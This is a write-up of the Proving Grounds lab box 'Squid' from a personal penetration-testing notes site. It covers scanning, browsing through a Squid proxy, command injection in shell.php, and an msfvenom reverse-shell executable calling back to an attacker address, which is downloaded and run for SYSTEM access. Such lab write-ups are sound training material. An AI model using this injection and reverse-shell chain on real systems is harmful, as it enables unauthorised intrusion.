AesirSec
  • 🏑Home
  • πŸ“šBlog
    • Radio Silence
    • OSCP Strategy
    • Plan for 2023
    • PNPT
    • Plan for 2022
    • eJPT
  • ❓Enumeration
  • 🐧Linux
    • Commands
    • Restricted Shell Bypassing
    • Stabilize Shell
  • πŸͺŸWindows
    • Commands
    • Transferring Files
  • πŸ“•Active Directory
    • Enumeration
    • Attacking AD Initial Vectors
    • Ipv6 attacks
    • Post Compromise Enum
    • Strategy
  • #️Privilege Escalation
    • 🐳Docker
    • 🐧Linux
    • πŸͺŸWindows
  • πŸ•ΈοΈWeb Apps
    • LFI
    • Apache
    • CSRF
    • PHP
    • XSS
    • SQLi
    • Pay Loads All The Things
  • πŸ‘ΎBuffer Overflows
  • πŸ’»Programming
    • 🐍Python
  • πŸ‘¨β€πŸ’»Ports/Technologies
    • FTP - Port 21
    • SSH - Port 22
    • Telnet - Port 23
    • DNS - 53
    • HTTP/S - 80/443
    • RPC - 135
    • SMB - 139/445
    • LDAP - 389/636
    • SQL - Port 3306
    • Docker
    • IIS
  • πŸ› οΈTools
    • ffuf
    • wwwtree
    • Rogue LDAP Servers
    • Wpscan
    • crackmapexec
    • msfvenom
    • John the Ripper
    • Hydra
  • 🐬Flipper Zero/ Radio Frequency
  • πŸ—ƒοΈBoxes/Write Ups
    • Template
    • πŸ‰Game Of Active Directory v2 - Day 1
    • Proving Grounds
      • Proving Grounds Practice
        • πŸ“šHeist
        • πŸ“šHutch
        • πŸͺŸInternal
        • πŸͺŸShenzi
        • πŸͺŸJacko
        • πŸͺŸDVR4 - qued
        • πŸͺŸNickel
        • πŸͺŸSlort
        • 🐧Walla
        • 🐧Snookums
        • 🐧Exfiltrated
        • 🐧Wheels
        • 🐧ClamAV
        • πŸͺŸSquid
        • πŸͺŸAlgernon
        • πŸͺŸHelpdesk
      • Proving Grounds Play
        • πŸͺŸSams
        • 🐧Assertion101
        • 🐧DriftingBlues6
        • 🐧DC-2 - unfinished
        • 🐧InfoSecPrep
        • 🐧Stapler
        • 🐧BBSCute
        • 🐧SoSimple
        • 🐧Solstice
        • 🐧FunBoxEasyEnum
        • 🐧Sumo
        • 🐧FunBoxRookie
        • 🐧MoneyBox
        • 🐧CyberSploit1
        • 🐧Wpawn
        • 🐧Dawn
        • 🐧Pwned1
        • 🐧FunBoxEasy
        • 🐧DC-1
    • TryHackMe
      • πŸͺŸAnthem
  • πŸ”—Helpful Links
  • πŸ§™whoami
  • πŸ΄β€β˜ οΈGithub
  • πŸ“‘Discord
  • 🐦Twitter
Powered by GitBook
On this page
  • Enumeration
  • Port 3128
  • Root

Was this helpful?

  1. Boxes/Write Ups
  2. Proving Grounds
  3. Proving Grounds Practice

Squid

PreviousClamAVNextAlgernon

Last updated 2 years ago

Was this helpful?

192.168.90.189

Enumeration

Used rustscan to find the initial port then nmap to do a service scan as Nmap scanning this whole box was very slow.

Nmap scan

sudo nmap 192.168.90.189 -Pn -sV -p 3128

Port 3128

Found Squid 4.14 running on this port.

Using curl to pull a webpage through the proxy.

curl --proxy http://192.168.90.189:3128 192.168.90.189:8080

Ran dirbuster through the proxy and found some interesting pages. Added a proxy in foxyproxy which let me view the web pages.

Dirbuster found an interesting page.

Page says undefined cmd in shell.php. Which would be using the system function. 😈 Added ?cmd=whoami

Confirmed command injection. Also confirmed this is running as nt authority\system so a reverse shell from here would land straight to root... or nt authority\system.

Made a reverse shell exe with msfvennom.

msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.49.90 LPORT=6699 --platform windows -a x64 -e x64/xor -f exe -o shell2.exe

Curled the shell onto the machine by cmd injection.

Confirmed the file was there. Had to send shell2.exe after the picture above because I messed up the first msfvenom command.

Ran file by sending the cmd for the exe in the browser.

Root

Found that you can use the proxy to scan the machines internal ports.

πŸ—ƒοΈ
πŸͺŸ
https://book.hacktricks.xyz/network-services-pentesting/3128-pentesting-squid
https://github.com/aancw/spose